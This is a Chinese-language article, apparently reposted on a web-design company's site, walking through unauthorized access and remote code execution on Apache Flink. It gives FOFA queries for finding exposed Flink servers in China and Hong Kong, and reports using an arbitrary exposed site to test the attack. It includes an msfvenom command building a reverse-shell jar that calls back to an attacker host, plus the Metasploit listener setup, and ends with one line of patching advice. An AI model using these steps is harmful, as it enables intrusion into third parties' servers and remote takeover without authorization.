這篇文章給大家分享的是有關(guān)Apache Flink未授權(quán)訪問(wèn)+遠(yuǎn)程代碼執(zhí)行的示例分析的內(nèi)容。小編覺(jué)得挺實(shí)用的，因此分享給大家做個(gè)參考，一起跟隨小編過(guò)來(lái)看看吧。

創(chuàng)新互聯(lián)專業(yè)為企業(yè)提供襄城網(wǎng)站建設(shè)、襄城做網(wǎng)站、襄城網(wǎng)站設(shè)計(jì)、襄城網(wǎng)站制作等企業(yè)網(wǎng)站建設(shè)、網(wǎng)頁(yè)設(shè)計(jì)與制作、襄城企業(yè)網(wǎng)站模板建站服務(wù)，十年襄城做網(wǎng)站經(jīng)驗(yàn)，不只是建網(wǎng)站，更提供有價(jià)值的思路和整體網(wǎng)絡(luò)服務(wù)。

 

Apache Flink 未授權(quán)訪問(wèn)+遠(yuǎn)程代碼執(zhí)行

FOFA

FOFA 語(yǔ)句
app="Apache-Flink" && country="CN"
app="Apache-Flink" && country="CN" && region="HK"

 

 

• 國(guó)內(nèi)還是很多使用 Apache Flink 的，大概有1K+的數(shù)量左右

 

漏洞復(fù)現(xiàn)

---

1、這里隨便搞個(gè)站打開(kāi)進(jìn)行復(fù)現(xiàn)，打開(kāi)以后就長(zhǎng)這樣子。

 

點(diǎn)擊Submit New Job翻譯：文件上傳 2、打開(kāi)MSF 生成一個(gè) jar 木馬

msfvenom -p java/meterpreter/reverse_tcp LHOST=**.***.59.61  LPORT=4444 -f jar > testone.jar

 

 

3、點(diǎn)擊 Add 上傳 jar 文件

 

4、設(shè)置監(jiān)聽(tīng)端口

msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload java/shell/reverse_tcp 
payload => java/shell/reverse_tcp
msf5 exploit(multi/handler) > set lhost XX.XXX.XX.61
lhost => XX.XXX.XX.61
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run

 

 

5、點(diǎn)擊下 submit

 

6、反彈shell成功

 

 

修復(fù)建議

建議用戶關(guān)注Apache Flink官網(wǎng)，及時(shí)獲取該漏洞最新補(bǔ)丁。臨時(shí)解決建議 設(shè)置IP白名單只允許信任的IP訪問(wèn)控制臺(tái)并添加訪問(wèn)認(rèn)證。

感謝各位的閱讀！關(guān)于“Apache Flink未授權(quán)訪問(wèn)+遠(yuǎn)程代碼執(zhí)行的示例分析”這篇文章就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，讓大家可以學(xué)到更多知識(shí)，如果覺(jué)得文章不錯(cuò)，可以把它分享出去讓更多的人看到吧！

本文名稱：ApacheFlink未授權(quán)訪問(wèn)+遠(yuǎn)程代碼執(zhí)行的示例分析
當(dāng)前路徑：http://jinyejixie.com/article28/jpdjcp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供微信公眾號(hào)、小程序開(kāi)發(fā)、網(wǎng)站制作、標(biāo)簽優(yōu)化、App設(shè)計(jì)、Google

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)